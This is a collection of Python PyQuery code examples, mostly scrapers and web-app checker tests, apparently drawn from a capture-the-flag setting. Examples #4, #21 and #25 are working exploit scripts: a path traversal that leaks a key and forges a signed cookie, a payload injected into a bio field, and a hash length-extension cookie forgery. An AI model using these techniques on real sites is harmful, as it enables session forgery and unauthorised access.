Example #1
    def write_bio_test(self):
        s = req.session()
        rs = s.get(self.url + 'login')
        html = rs.text
        token = self._get_token(html)
        x, y = self._get_answer(html)
        rs = s.post(url=self.url + 'login',
                    data={
                        self.csrfname: token,
                        "username": "******",
                        "password": "******",
                        "captcha_x": x,
                        "captcha_y": y
                    })

        rs = s.get(self.url + 'user')
        html = rs.text

        token = self._get_token(html)
        rs = s.post(self.url + "user",
                    data={
                        self.csrfname: token,
                        "bio": "Too Young Too Simple"
                    })

        dom = PQ(rs.text)
        success = dom("div.alert.alert-success")
        success = PQ(success).text().strip()
        if len(success):
            print "[+] Write Bio Success"
            return True
        print "[-] Write Bio Failed"
        return False
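Several of these test methods depend on helpers the excerpt never shows: `PQ` is `pyquery.PyQuery`, `req` is the `requests` module, and `_get_answer` pulls the captcha answer out of the login page (`_get_token` itself appears in Example #10). A minimal sketch of `_get_answer`, assuming the page leaks the expected coordinates in hidden inputs named `captcha_x` and `captcha_y`; the real extraction depends on the actual challenge:

    # Hedged sketch, not the original helper: a real captcha would not expose
    # its answer in hidden form fields.
    def _get_answer(self, html):
        dom = PQ(html)
        x = dom('input[name="captcha_x"]').attr('value')
        y = dom('input[name="captcha_y"]').attr('value')
        return x, y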
Example #2
    def analyse_detail_page(self, html):
        pq = PQ(html)
        div = pq('.main')
        title = div('.QTitle a').text()
        question = div('.Content>.detail').text()
        tags = list(PQ(a).text() for a in div('#tags_nav a'))
        answers = list()
        for li in pq('.QuestionReplies li'):
            li = PQ(li)
            answer_content = li('.body .detail').text()
            vote_div = PQ(li.prev('div'))
            answer_accepted = bool(vote_div('.accept-on'))
            answers.append((answer_content, answer_accepted))
        try:
            text = pq('div[class="Asker special"] .pinfo>span:eq(1)').text()
            count_answer, count_view = re.search(u'(\d+) \u56de/(\d+)\u9605',
                                                 text).groups()
        except AttributeError:  # re.search found no match
            count_answer = 0
            count_view = 1

        return dict(title=title,
                    content=question,
                    tags=tags,
                    answers=answers,
                    count_answer=count_answer,
                    count_view=count_view)
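`analyse_detail_page` only parses; fetching the page is left to the caller. A hypothetical usage sketch (the URL and the `spider` instance are assumptions, not part of the original):

import requests

html = requests.get('http://example.com/question/1').text  # hypothetical URL
detail = spider.analyse_detail_page(html)  # spider: hypothetical instance
print detail['title'], detail['count_answer'], detail['count_view']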
Example #3
    def _process(self, page):
        pq = PQ(page)
        data = []
        products = pq('li.grid-tile')
        for product in products:
            foo = PQ(product)
            #origin_price = foo('.product-standard-price').text().replace('MSRP:', '').replace('$', '').strip()
            origin_price = re.findall('[\d\.]+',
                                      foo('.product-standard-price').text())
            sales_price = re.findall('[\d\.]+',
                                     foo('.product-sales-price').text())
            if not origin_price or not sales_price:
                continue
            data.append({
                'image': foo('img').attr('src'),
                'link': parse_url(foo('.name-link').attr('href')),
                'title': foo('.name-link').text(),
                'original_price': origin_price[0],
                'sales_price': sales_price[0]
            })

        data = {
            'website': 'carters',
            'currency': 'USD',
            'country': 'USA',
            'store_id': self.store_id,
            'data': json.dumps(data)
        }
        data.update(self._extra_kwargs)

        self._save(data)
Example #4
    def exp_make_cookie(self):
        url = "http://localhost:8233/static/../assets.key"

        req = urllib2.Request(url)

        res_data = urllib2.urlopen(req)
        key = res_data.read()

        tt = escape.native_str(
            create_signed_value(key,
                                'username',
                                'Jack_Ma',
                                version=None,
                                key_version=None))

        rs = self.session.get(self.url + 'login')
        html = rs.text
        token = self._get_token(html)
        x, y = self._get_answer(html)

        # rs = self.session.post(url=self.url + 'login', data={
        #     self.csrfname: token,
        #     "username": "******",
        # })
        cookie = {self.csrfname: token, "username": tt}
        rs = self.session.get(url=self.url + 'user', cookies=cookie)
        dom = PQ(rs.text)
        failed = dom('div')
        failed = PQ(failed).text().strip()

        flag = re.findall(r"flag=(.+?) if", failed)
        print flag
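Example #4 works because `create_signed_value` (from `tornado.web`) signs an arbitrary `username` with the key leaked via the `static/../assets.key` path traversal, producing a cookie the server will trust. A sanity check is to round-trip the forged value through Tornado's own decoder; a minimal sketch, with `key` standing in for the leaked secret:

# Sketch: verify a forged Tornado secure cookie locally before sending it.
from tornado.web import create_signed_value, decode_signed_value

key = 'leaked-secret'  # placeholder for the real assets.key contents
forged = create_signed_value(key, 'username', 'Jack_Ma')
assert decode_signed_value(key, 'username', forged) == b'Jack_Ma'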
Example #5
def gettoken(html):
    token_name = "token"
    dom = PQ(html)
    form = dom("form")
    token = str(PQ(form)("input[name=\"%s\"]" %
                         token_name).attr("value")).strip()
    return token
Example #6
    def shopcar_add_test(self):
        rs = self.session.get(self.url + 'shop')
        dom = PQ(rs.text)
        form = dom("form")
        token = str(
            PQ(form[0])("input[name=\"%s\"]" %
                        self.csrfname).attr("value")).strip()
        rs = self.session.post(self.url + 'shopcar/add',
                               data={
                                   self.csrfname: token,
                                   'id': 1
                               })
        dom = PQ(rs.text)
        commodity = dom('div.shopcar_list')
        commodity = PQ(commodity).text().strip()
        if len(commodity):
            print '[+] Shopcar Add Success'
            return True
        print '[-] Shopcar Add Failed'
        return False
Example #7
def login(s, username, password, mail, csrfname, url):
    rs = s.get(url + 'login')
    html = rs.text
    token = get_token(html, csrfname)
    x, y = get_answer(html)
    rs = s.post(url=url + 'login',
                data={
                    csrfname: token,
                    "username": username,
                    "password": password,
                    "captcha_x": x,
                    "captcha_y": y
                })

    try:
        dom = PQ(rs.text)
        error = dom("div.alert.alert-danger")
        error = PQ(error).text().strip()
        if len(error):
            print "[-] Login failed."
            return False
    except:
        pass

    print "[+] Login Success."
    return True
Example #8
 def register_test(self, invite=''):
     rs = self.session.get(self.url + 'register')
     html = rs.text
     token = self._get_token(html)
     x, y = self._get_answer(html)
     rs = self.session.post(url=self.url + 'register',
                            data={
                                self.csrfname: token,
                                "username": self.username,
                                "password": self.password,
                                "password_confirm": self.password,
                                "mail": self.mail,
                                "invite_user": invite,
                                "captcha_x": x,
                                "captcha_y": y,
                            })
     try:
         dom = PQ(rs.text)
         error = dom("div.alert.alert-danger")
         error = PQ(error).text().strip()
         if len(error):
             print "[-] Register failed."
             return False
     except:
         pass
     print "[+] Register Success."
     return True
Example #9
def register(s, username, password, mail, csrfname, url, invite=''):
    rs = s.get(url + 'register')
    html = rs.text
    token = get_token(html, csrfname)
    x, y = get_answer(html)
    rs = s.post(url=url + 'register',
                data={
                    csrfname: token,
                    "username": username,
                    "password": password,
                    "password_confirm": password,
                    "mail": mail,
                    "invite_user": invite,
                    "captcha_x": x,
                    "captcha_y": y,
                })

    try:
        dom = PQ(rs.text)
        error = dom("div.alert.alert-danger")
        error = PQ(error).text().strip()
        if len(error):
            print "[-] Register failed."
            return False
    except:
        pass

    print "[+] Register Success."
    return True
Example #10
 def _get_token(self, html):
     dom = PQ(html)
     form = dom("form")
     token = str(
         PQ(form)("input[name=\"%s\"]" %
                  self.csrfname).attr("value")).strip()
     return token
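One pitfall worth noting: `.attr("value")` returns `None` when the input is missing, so `str(None).strip()` silently produces the literal string 'None' rather than failing. A slightly safer variant, as a sketch (`_get_token_safe` is a hypothetical name):

    # Sketch: return '' instead of the string 'None' when the token input is absent.
    def _get_token_safe(self, html):
        value = PQ(html)("form input[name=\"%s\"]" % self.csrfname).attr("value")
        return value.strip() if value else ''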
Example #11
def proc_item_list(q):
    keys = ['ruten', 'pchome']

    for k in keys:
        items = q('a[%s]' % k).filter(
            lambda i, this: len(PQ(this).children('img')) == 0)
        if len(items) > 0:
            print 'found via key "%s"' % k
            break

    print 'total links found: %d' % len(items)

    if len(items) == 0:
        return -1

    c = 0
    for i in items:
        m = re.search(DISEL_TITLE, PQ(i).text())
        if not m:
            continue

        c += 1

        dt = {
            'style': m.group('STYLE'),
            'wash': m.group('WASH'),
            'url': PQ(i).attr('href')
        }

        # QUEUE.put(dt)
        proc_item(dt)
        # print dt

    return c
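`DISEL_TITLE` is never shown; from its use it must be a regex (or compiled pattern) with named groups `STYLE` and `WASH`. A plausible sketch, assuming listing titles of a style word followed by a wash code; the real pattern depends on the actual titles:

import re

# Assumed shape of DISEL_TITLE; the real pattern is not in the excerpt.
DISEL_TITLE = re.compile(r'(?P<STYLE>[A-Z\-]+)\s+(?P<WASH>\w+)')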
Example #12
 def login(self):
     rs = self.session.get(self.url + 'login')
     html = rs.text
     token = self._get_token(html)
     x, y = self._get_answer(html)
     rs = self.session.post(url=self.url + 'login',
                            data={
                                self.csrfname: token,
                                "username": self.username,
                                "password": self.password,
                                "captcha_x": x,
                                "captcha_y": y
                            })
     try:
         dom = PQ(rs.text)
         error = dom("div.alert.alert-danger")
         error = PQ(error).text().strip()
         if len(error):
             print "[-] Login failed."
             return False
     except:
         pass
     print "[+] Login Success."
     self.wallet = self._get_user_wallet()
     return True
Example #13
def get_album_page(album_id):
    album_url = "http://www.ugirls.com/Content/List/Magazine-%s.html" % album_id
    album_response = net.http_request(album_url, method="GET")
    result = {
        "image_url_list": [],  # 全部图片地址
        "is_delete": False,  # 是不是已经被删除
        "model_name": "",  # 模特名字
    }
    if album_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(album_response.status))
    if album_response.data.find("该页面不存在,或者已经被删除!") >= 0:
        result["is_delete"] = True
        return result
    # Extract the model's name
    model_name = PQ(album_response.data).find(
        "div.ren_head div.ren_head_c a").attr("title")
    if not model_name:
        raise crawler.CrawlerException("模特信息截取模特名字失败\n%s" %
                                       album_response.data)
    result["model_name"] = model_name.encode("UTF-8").strip()
    # Collect all image URLs
    image_list_selector = PQ(album_response.data).find("ul#myGallery li img")
    if image_list_selector.length == 0:
        raise crawler.CrawlerException("页面匹配图片地址失败\n%s" % album_response.data)
    for image_index in range(0, image_list_selector.length):
        image_url = image_list_selector.eq(image_index).attr("src")
        if image_url.find("_magazine_web_m.") == -1:
            raise crawler.CrawlerException("图片地址不符合规则\n%s" % image_url)
        result["image_url_list"].append(
            image_url.replace("_magazine_web_m.", "_magazine_web_l."))
    return result
Example #14
    def reset_password_test(self):
        res = self.session.get(self.url + 'pass/reset')
        html = res.text
        token = self._get_token(html)
        x, y = self._get_answer(html)
        rs = self.session.post(self.url + 'pass/reset',
                               data={
                                   self.csrfname: token,
                                   'mail': self.mail,
                                   "captcha_x": x,
                                   "captcha_y": y
                               })
        dom = PQ(rs.text)
        failed = dom('div.alert.alert-danger')
        failed = PQ(failed).text().strip()
        if len(failed):
            print '[-] Reset Password Failed'
            return True
        print '[+] Reset Password Success'
        return False
Example #15
def parse_html(filename, download='磁力'):
    with open(filename, encoding='utf-8') as f:
        html_raw = f.read()
    html = PQ(html_raw)
    alist = html.find('a')
    for a in alist:
        if download in PQ(a).text():
            print(a.attrib['href'])
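A quick usage note: `parse_html` prints the `href` of every `<a>` whose link text contains the keyword (the default '磁力' means "magnet link"). Hypothetical calls, assuming a saved search-results page:

parse_html('results.html')  # 'results.html' is an assumption
parse_html('results.html', download='torrent')  # match a different substring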
Example #16
 def extract_detail_url(self, html):
     pq = PQ(html)
     div = pq("div[class='question-detail']")
     hrefs = list()
     for a in div('a:eq(0)'):
         href = PQ(a).attr('href')
         hrefs.append(href)
     return hrefs
Example #17
def get_album_page(sub_path, page_count):
    album_pagination_url = "http://www.88mmw.com/%s/list_%s_%s.html" % (
        sub_path, SUB_PATH_LIST[sub_path], page_count)
    album_pagination_response = net.http_request(album_pagination_url,
                                                 method="GET")
    result = {
        "album_info_list": [],  # 全部图集信息
        "is_over": False,  # 是不是最后一页图集
    }
    if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(album_pagination_response.status))
    # Decode the page (site serves GBK)
    album_pagination_html = album_pagination_response.data.decode("GBK")
    # Extract album info; two page layouts exist
    album_list_selector = PQ(album_pagination_html).find("div.xxx li a")
    if album_list_selector.length == 0:
        album_list_selector = PQ(album_pagination_html).find("div.yyy li a")
    if album_list_selector.length == 0:
        raise crawler.CrawlerException("页面截取图集列表失败\n%s" %
                                       album_pagination_html.encode("UTF-8"))
    for album_index in range(0, album_list_selector.length):
        result_album_info = {
            "album_title": "",  # 图集id
            "page_id": None,  # 图集页面id
        }
        album_selector = album_list_selector.eq(album_index)
        # Extract the album id
        album_url = album_selector.attr("href")
        if not album_url:
            raise crawler.CrawlerException(
                "图集列表截取图集地址失败\n%s" % album_selector.html().encode("UTF-8"))
        album_id = album_url.split("/")[-2]
        if not crawler.is_integer(album_id):
            raise crawler.CrawlerException("图集地址截取图集id失败\n%s" % str(album_url))
        result_album_info["page_id"] = album_id
        # Extract the album title
        album_title = album_selector.attr("title").encode("UTF-8")
        if len(re.findall("_共\d*张", album_title)) == 1:
            result_album_info["album_title"] = album_title[:album_title.
                                                           rfind("_共")]
        else:
            result_album_info["album_title"] = album_title
        result["album_info_list"].append(result_album_info)
    # Determine whether this is the last page
    max_page_info = PQ(album_pagination_html).find("div.page a").eq(-1).text()
    if not max_page_info:
        raise crawler.CrawlerException("总页数信息截取失败\n%s" %
                                       album_pagination_html.encode("UTF-8"))
    max_page_count = tool.find_sub_string(max_page_info.encode("UTF-8"), "共",
                                          "页")
    if not crawler.is_integer(max_page_count):
        raise crawler.CrawlerException("总页数截取失败\n%s" %
                                       max_page_info.encode("UTF-8"))
    result["is_over"] = page_count >= int(max_page_count)
    return result
Example #18
 def extract_detail_url(self, html):
     pq = PQ(html)
     div = pq("div[class='question-summary']")
     hrefs = list()
     for a in div('h3 a'):
         href = PQ(a).attr('href')
         if href.startswith('/'):
             href = self.BASE_URL + href
         hrefs.append(href)
     return hrefs
Example #19
    def getBusArray(self):
        page = PQ(self.URL_DATA)
        array_buttons = []
        selectList = PQ('#linea', page)('option')
        for option in selectList:
            bus = PQ(option).attr('idlinea')
            if bus:
                array_buttons.append([PQ(option).text()])

        return array_buttons
Example #20
def get_album_page(album_id):
    page_count = max_page_count = 1
    result = {
        "album_title": "",  # 图集标题
        "image_url_list": [],  # 全部图片地址
        "is_delete": False,  # 是不是已经被删除
    }
    while page_count <= max_page_count:
        album_pagination_url = "http://www.youzi4.cc/mm/%s/%s_%s.html" % (
            album_id, album_id, page_count)
        album_pagination_response = net.http_request(album_pagination_url,
                                                     method="GET")
        if album_pagination_response.status == 404 and page_count == 1:
            result["is_delete"] = True
            return result
        if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
            raise crawler.CrawlerException(
                "第%s页 " % page_count +
                crawler.request_failre(album_pagination_response.status))
        # Check whether the album has been deleted
        if page_count == 1:
            # Extract the album title
            album_title = PQ(album_pagination_response.data.decode(
                "UTF-8")).find("meta[name='description']").attr("content")
            if not album_title:
                raise crawler.CrawlerException("页面截取标题失败\n%s" %
                                               album_pagination_response.data)
            result["album_title"] = album_title.encode("UTF-8")
        # Extract the album's image URLs
        image_list_selector = PQ(
            album_pagination_response.data).find("div.articleV4Body a img")
        if image_list_selector.length == 0:
            raise crawler.CrawlerException(
                "第%s页 页面匹配图片地址失败\n%s" %
                (page_count, album_pagination_response.data))
        for image_index in range(0, image_list_selector.length):
            result["image_url_list"].append(
                str(image_list_selector.eq(image_index).attr("src")))
        # Extract the total page count
        pagination_list_selector = PQ(
            album_pagination_response.data).find("ul.articleV4Page a.page-a")
        if pagination_list_selector.length > 0:
            for pagination_index in range(0, pagination_list_selector.length):
                temp_page_count = pagination_list_selector.eq(
                    pagination_index).html()
                if crawler.is_integer(temp_page_count):
                    max_page_count = max(int(temp_page_count), max_page_count)
        else:
            if page_count > 1:
                raise crawler.CrawlerException(
                    "第%s页 页面匹配分页信息失败\n%s" %
                    (page_count, album_pagination_response.data))
        page_count += 1
    return result
Example #21
def write_bio(s, payload, csrfname, url):
    rs = s.get(url + 'user')
    html = rs.text
    token = get_token(html, csrfname)
    rs = s.post(url + "user", data={csrfname: token, "bio": payload})
    dom = PQ(rs.text)
    success = dom("div.alert.alert-success")
    success = PQ(success).text().strip()
    if len(success):
        print "[+] Write Bio Success"
        return True
    return False
Example #22
 def getBusFirstStreet(self, bus):
     page = PQ(self.URL_DATA)
     array_buttons = []
     idLinea = None  # avoid a NameError when no option matches the bus number
     selectList = PQ('#linea', page)('option')
     for option in selectList:
         bus_number = PQ(option).text()
         if bus_number == str(bus):
             idLinea = PQ(option).attr('idlinea')
             print(idLinea)
     data = {"accion": self.ACTION_FIRST_STREET, "idLinea": idLinea}
     r = requests.post(self.URL_ACTION, data=data)
     for street in loads(r.content.decode("utf-8-sig").encode("utf-8")):
         array_buttons.append([street["desc"]])
     return array_buttons
Example #23
def get_one_page_album(account_id, page_count):
    # http://bcy.net/u/50220/post/cos?&p=1
    album_pagination_url = "http://bcy.net/u/%s/post/cos" % account_id
    query_data = {"p": page_count}
    album_pagination_response = net.http_request(album_pagination_url, method="GET", fields=query_data)
    result = {
        "album_info_list": [],  # 全部作品信息
        "coser_id": None,  # coser id
        "is_over": False,  # 是不是最后一页作品
    }
    if album_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(crawler.request_failre(album_pagination_response.status))
    if page_count == 1 and album_pagination_response.data.find("<h2>用户不存在</h2>") >= 0:
        raise crawler.CrawlerException("账号不存在")
    # Extract the coser id
    coser_id_find = re.findall('<a href="/coser/detail/([\d]+)/\$\{post.rp_id\}', album_pagination_response.data)
    if len(coser_id_find) != 1:
        raise crawler.CrawlerException("页面截取coser id失败\n%s" % album_pagination_response.data)
    if not crawler.is_integer(coser_id_find[0]):
        raise crawler.CrawlerException("页面截取coser id类型不正确\n%s" % album_pagination_response.data)
    result["coser_id"] = coser_id_find[0]
    # Extract post info
    album_list_selector = PQ(album_pagination_response.data.decode("UTF-8")).find("ul.l-grid__inner li.l-grid__item")
    for album_index in range(0, album_list_selector.size()):
        album_selector = album_list_selector.eq(album_index)
        result_album_info = {
            "album_id": None,  # 作品id
            "album_title": None,  # 作品标题
        }
        # Extract the post id
        album_url = album_selector.find(".postWorkCard__img a.postWorkCard__link").attr("href")
        if not album_url:
            raise crawler.CrawlerException("作品信息截取作品地址失败\n%s" % album_selector.html().encode("UTF-8"))
        album_id = str(album_url).split("/")[-1]
        if not crawler.is_integer(album_id):
            raise crawler.CrawlerException("作品地址 %s 截取作品id失败\n%s" % (album_url, album_selector.html().encode("UTF-8")))
        result_album_info['album_id'] = album_id
        # Extract the post title
        album_title = album_selector.find(".postWorkCard__img img").attr("alt")
        result_album_info["album_title"] = str(album_title.encode("UTF-8"))
        result["album_info_list"].append(result_album_info)
    # Determine whether this is the last page
    last_pagination_selector = PQ(album_pagination_response.data).find("#js-showPagination ul.pager li:last a")
    if last_pagination_selector.size() == 1:
        max_page_count = int(last_pagination_selector.attr("href").strip().split("&p=")[-1])
        result["is_over"] = page_count >= max_page_count
    else:
        result["is_over"] = True
    return result
Example #24
 def shopcar_add_test(self):
     rs = self.session.get(self.url + 'shop/')
     token = self._get_token(rs.text)
     rs = self.session.post(self.url + 'shopcar/add/', data={
         self.csrfname: token,
         'id': random.randint(1, 100)
     })
     dom = PQ(rs.text)
     commodity = dom('div.shopcar_list')
     commodity = PQ(commodity).text().strip()
     if len(commodity):
         print '[+] Shopcar Add Success'
         return True
     print '[-] Shopcar Add Failed'
     return False
Example #25
def getflag(host, port):
    wc = WebChecker(str(host), str(port))
    wc.register()
    cookies = wc.login()
    gg = hashpump(cookies['user_cookie'], wc.username, 'vip',
                  int(cookies['secretkey_length']))
    cookies['user_cookie'] = gg[0]
    cookies['username'] = gg[1].encode('hex')
    se = req.session()
    url = 'http://%s:%s/' % (host, port)
    rs = se.get(url + 'user', cookies=cookies)
    dom = PQ(rs.text)
    flag = dom("div.alert.alert-success")
    flag = PQ(flag).text().strip()
    print flag
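Example #25 is a hash length-extension attack. `hashpump` takes the MAC the server issued, the data it originally signed, the bytes to append, and the secret-key length, and returns a forged `(signature, message)` pair without ever knowing the key; the forged cookie then grants the 'vip' role. A sketch of the call with placeholder values:

# All values below are placeholders illustrating hashpump's argument order.
new_sig, new_msg = hashpump(
    'deadbeef',            # hex MAC issued by the server
    'original_username',   # data the server originally signed
    'vip',                 # payload to append
    16)                    # length of the unknown secret key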
Example #26
def op_all_text(text):
    text = PQ(text)
    try:
        for item in text('div.index_toplist').items():
            t = item('.toptab span').text().split()[0]
            format1 = '{}的{}'
            p = list(
                zip([i for i in item('.tabRight').text() if i != ' '],
                    [i.attr('id')[-1]
                     for i in item('.tabRight span').items()]))
            for ul in item('.topbooks ul').items():
                for name, num in p:
                    a = {'排行榜': t}
                    if num == ul.parent().attr('id')[-1]:
                        a['排行榜'] = format1.format(name, t)
                        p1 = 1
                        for li in ul('li').items():
                            a['更新日期'] = li('.hits').text()
                            a['排名'] = li('.num').text()
                            a['作品'] = li('a').text()
                            a['作品链接'] = 'https://www.qu.la' + li('a').attr(
                                'href')
                            yield a, p1
                            a = {}
                            p1 = 0
                    else:
                        continue
    except:
        print('op_all_text has an error!')
Example #27
def get_book(list1):
    """
    list1: dict holding the book title, its link, and the ranking list it came from.
    Fetches every chapter of the book and writes it to the relevant files.
    """
    text = get_url(list1['href'])
    text = PQ(text)
    text = text('div#list')
    t = 0  # for testing only
    for dd in text('dd').items():
        try:
            # for testing only
            if 'book' in dd('a').attr('href'):
                t += 1
                print(list1)
                if t == 8:
                    break
                write_one_chapter('https://www.qu.la' + dd('a').attr('href'),
                                  list1)
                if t == 4:  # for testing only
                    return  # for testing only
        except:
            print('get_book has a problem!')

            continue
Example #28
def get_market_game_trade_card_price(game_id, login_cookie):
    cookies_list = {"steamLogin": login_cookie}
    market_search_url = "http://steamcommunity.com/market/search/render/"
    market_search_url += "?query=&count=20&appid=753&category_753_Game[0]=tag_app_%s&category_753_cardborder[0]=tag_cardborder_0" % game_id
    market_search_response = net.http_request(market_search_url,
                                              method="GET",
                                              cookies_list=cookies_list,
                                              json_decode=True)
    if market_search_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(market_search_response.status))
    market_item_list = {}
    if not crawler.check_sub_key(
        ("success", "results_html"), market_search_response.json_data):
        raise crawler.CrawlerException(
            "返回信息'success'或'results_html'字段不存在\n%s" %
            market_search_response.json_data)
    if market_search_response.json_data["success"] is not True:
        raise crawler.CrawlerException("返回信息'success'字段取值不正确\n%s" %
                                       market_search_response.json_data)
    card_selector = PQ(market_search_response.json_data["results_html"]).find(
        ".market_listing_row_link")
    for index in range(0, card_selector.length):
        card_name = card_selector.eq(index).find(
            ".market_listing_item_name").text()
        card_min_price = card_selector.eq(index).find(
            "span.normal_price span.normal_price").text().encode(
                "UTF-8").replace("¥ ", "")
        market_item_list[card_name] = card_min_price
    # {'Pamu': '1.77', 'Fumi (Trading Card)': '2.14', 'Mio (Trading Card)': '1.33', 'Bonnibel (Trading Card)': '1.49', 'Groupshot': '1.87', 'Q-Piddy': '1.35', 'Elle (Trading Card)': '1.19', 'Quill': '1.50', 'Iro (Trading Card)': '1.42', 'Bearverly (Trading Card)': '1.27', 'Cassie (Trading Card)': '1.35'}
    return market_item_list
Example #29
def get_self_account_badges(account_id, login_cookie):
    # First page of badges
    badges_index_url = "http://steamcommunity.com/profiles/%s/badges/" % account_id
    cookies_list = {"steamLogin": login_cookie}
    badges_index_response = net.http_request(badges_index_url,
                                             method="GET",
                                             cookies_list=cookies_list)
    if badges_index_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(badges_index_response.status))
    badges_detail_url_list = []
    # Badge rows
    badges_selector = PQ(badges_index_response.data).find(
        ".maincontent .badges_sheet .badge_row")
    for index in range(0, badges_selector.length):
        badge_html = badges_selector.eq(index).html().encode("UTF-8")
        # Badges with no remaining card drops
        if badge_html.find("无剩余卡牌掉落") >= 0:
            # URL of the badge detail page
            badge_detail_url = tool.find_sub_string(
                badge_html, '<a class="badge_row_overlay" href="', '"/>')
            if not badge_detail_url:
                raise crawler.CrawlerException("徽章信息截取徽章详细界面地址失败\n%s" %
                                               badge_html)
            badges_detail_url_list.append(badge_detail_url)
    # ['http://steamcommunity.com/profiles/76561198172925593/gamecards/459820/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/357200/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/502740/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/359600/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/354380/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/359670/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/525300/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/337980/', 'http://steamcommunity.com/profiles/76561198172925593/gamecards/591420/']
    return badges_detail_url_list
Example #30
def get_one_page_account(page_count):
    account_pagination_url = "http://jigadori.fkoji.com/users"
    query_data = {"p": page_count}
    account_pagination_response = net.http_request(account_pagination_url,
                                                   method="GET",
                                                   fields=query_data)
    pagination_account_list = {}
    if account_pagination_response.status != net.HTTP_RETURN_CODE_SUCCEED:
        raise crawler.CrawlerException(
            crawler.request_failre(account_pagination_response.status))
    account_list_selector = PQ(account_pagination_response.data.decode(
        "UTF-8")).find(".users-list li")
    for account_index in range(0, account_list_selector.length):
        account_selector = account_list_selector.eq(account_index)
        # Get the member's name
        account_name = account_selector.find(".profile-name").eq(0).text()
        if not account_name:
            account_name = ""
            # raise robot.CrawlerException("成员信息截取成员名字失败\n\%s" % account_selector.html().encode("UTF-8"))
        else:
            account_name = account_name.strip().encode("UTF-8")
        # Get the Twitter account
        account_id = account_selector.find(".screen-name a").text()
        if not account_id:
            raise crawler.CrawlerException(
                "成员信息截取twitter账号失败\n\%s" %
                account_selector.html().encode("UTF-8"))
        account_id = account_id.strip().replace("@", "")
        pagination_account_list[account_id] = account_name
    return pagination_account_list